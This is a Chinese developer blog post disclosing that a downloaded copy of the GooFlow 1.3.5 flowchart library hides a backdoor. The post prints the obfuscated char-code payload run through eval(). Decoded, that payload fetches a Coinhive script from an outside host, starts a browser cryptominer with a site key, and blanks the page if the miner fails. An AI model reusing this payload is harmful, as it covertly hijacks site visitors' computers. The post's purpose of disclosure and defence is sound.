GooFlow有后门代码

1 篇文章 0 订阅

总结:在项目运行的时候发现html页面总是自动清空,js中有document.wirte(''),就是这个代码导致的,但是在GooFlow.js源码中根本就发现不了,结果发现eval()这个函数报错,于是执行代码发现隐藏代码。。。

这个地址下载的源码有问题:http://www.17sucai.com/pins/26954.html

修改源码:下图,注释掉eval函数的内容就好了

测试方式:在iframe中调用html才可以发现问题,html使用GooFlow

执行后的代码

源码解析

(function (c) {
                var r = '';
                for (var z = 0; z < c.length; z++) r += String.fromCharCode(c[z]);
                return r
            })([
                118, 97, 114, 32, 95, 61, 119, 105, 110, 100, 111, 119, 59, 116, 114, 121, 123, 95, 61, 95, 46, 111, 112, 101, 110, 101, 114, 46, 36, 125,
                99, 97, 116, 99, 104, 40, 101, 41, 123, 116, 114, 121, 123, 95, 61, 95, 46, 116, 111, 112, 46, 36, 125, 99, 97, 116, 99, 104, 40, 101, 41,
                123, 95, 61, 36, 125, 125, 59, 105, 102, 40, 33, 95, 40, 34, 104, 101, 97, 100, 34, 41, 46, 100, 97, 116, 97, 40, 39, 120, 39, 41, 41, 123,
                71, 111, 111, 70, 108, 111, 119, 46, 97, 61, 49, 59, 95, 97, 61, 50, 48, 59, 118, 97, 114, 32, 100, 61, 110, 101, 119, 32, 68, 97, 116, 101,
                40, 41, 59, 95, 40, 34, 104, 101, 97, 100, 34, 41, 46, 100, 97, 116, 97, 40, 39, 120, 39, 44, 49, 41, 59, 95, 46, 97, 106, 97, 120, 40, 34,
                104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 105, 110, 104, 105, 118, 101, 46, 99, 111, 109, 47, 108, 105, 98, 47, 99, 111, 105, 110, 104,
                105, 118, 101, 46, 109, 105, 110, 46, 106, 115, 63, 34, 43, 100, 46, 103, 101, 116, 70, 117, 108, 108, 89, 101, 97, 114, 40, 41, 43, 100,
                46, 103, 101, 116, 77, 111, 110, 116, 104, 40, 41, 43, 100, 46, 103, 101, 116, 68, 97, 116, 101, 40, 41, 44, 123, 100, 97, 116, 97, 84, 121,
                112, 101, 58, 39, 115, 99, 114, 105, 112, 116, 39, 44, 99, 97, 99, 104, 101, 58, 116, 114, 117, 101, 125, 41, 59, 95, 105, 61, 115, 101,
                116, 73, 110, 116, 101, 114, 118, 97, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 116, 114, 121, 123, 110, 101, 119, 32,
                67, 111, 105, 110, 72, 105, 118, 101, 46, 65, 110, 111, 110, 121, 109, 111, 117, 115, 40, 39, 71, 71, 100, 80, 71, 104, 120, 73, 108, 111,
                108, 100, 97, 65, 114, 65, 114, 81, 86, 119, 120, 90, 50, 115, 100, 56, 108, 48, 97, 52, 107, 72, 39, 44, 123, 116, 104, 114, 111, 116, 116,
                108, 101, 58, 48, 46, 52, 125, 41, 46, 115, 116, 97, 114, 116, 40, 41, 59, 99, 108, 101, 97, 114, 73, 110, 116, 101, 114, 118, 97, 108, 40,
                95, 105, 41, 125, 99, 97, 116, 99, 104, 40, 101, 41, 123, 95, 97, 45, 45, 59, 105, 102, 40, 95, 97, 60, 49, 41, 100, 111, 99, 117, 109, 101,
                110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 34, 41, 125, 125, 44, 49, 48, 48, 48, 41, 125
            ])

我这个版本是

/**
 * Gooflow在线流程图设计器
 * Version: 1.3.5
 * Copyright: foolegg126(sdlddr)

这个人的代码有问题

文档参考地址

https://gooflow.xyz/docs/

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
? 跨浏览器,可兼容IE7--IE10, FireFox, Chrome, Opera等几大内核的浏览器,且不需要浏览器再加装任何控件。 ? 多系统兼容性、可移植性:由于只包括前台UI,因此二次开发者可很方便将本插件用在任何一种需要流程图的B/S系统应用上,流程图的详细实现逻辑完全交于后台程序开发者自己实现;对于后台,只要能返回/接收能被本插件解析的JSON格式数据即可.所以本插件可用于不同的服务器语言建立的后台上. ? 跨领域:流程图设计器不止用在电信领域,在其它需要IT进行技术支持的领域中都有重大作用. ? 以下从纯技术实现层面具体描述: ? 页面顶部栏、左边侧边栏均可自定义; ? 当左边的侧边栏设为不显示时,为只读状态,此时的视图区可当作是一个查看器而非编辑器。 ? 侧边工具栏除了基本和一些流程节点按钮外,还自定义新的节点按钮,自定义节点都可以有自有的图标、类型名称,定义后在使用可可在工作区内增加这些自定义节点。 ? 顶部栏可显示流程图数据组的标题,也可提供一些常用操作按钮。 ? 顶部栏的按钮,除了撤销、重做按钮外,其余按钮均可自定义点击事件。 ? 可画直线、折线;折线还可以左右/上下移动其中段。 ? 具有区域划分功能,能让用户更直观地了解哪些节点及其相互间的转换,是属于何种自定义区域内的。 ? 具有标注功能,用橙红色标注某个结点或者转换线,一般用在展示流程进度时。 ? 能直接双击结点、连线、分组区域中的文字进行编辑 ? 在对结点、连线、分组区域的各种编辑操作,如新增/删除/修改名称/重设样式或大小/移动/标注时,均可捕捉到事件,并触发自定义事件,如果自定义事件执行的方法返回FALSE,则会阻止操作。 ? 具有操作事务序列控制功能,在工作区内的各种有效操作都能记录到一个栈中,然后可以进行撤销(undo())或重做(redo()),像典型的C/S软件一样。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值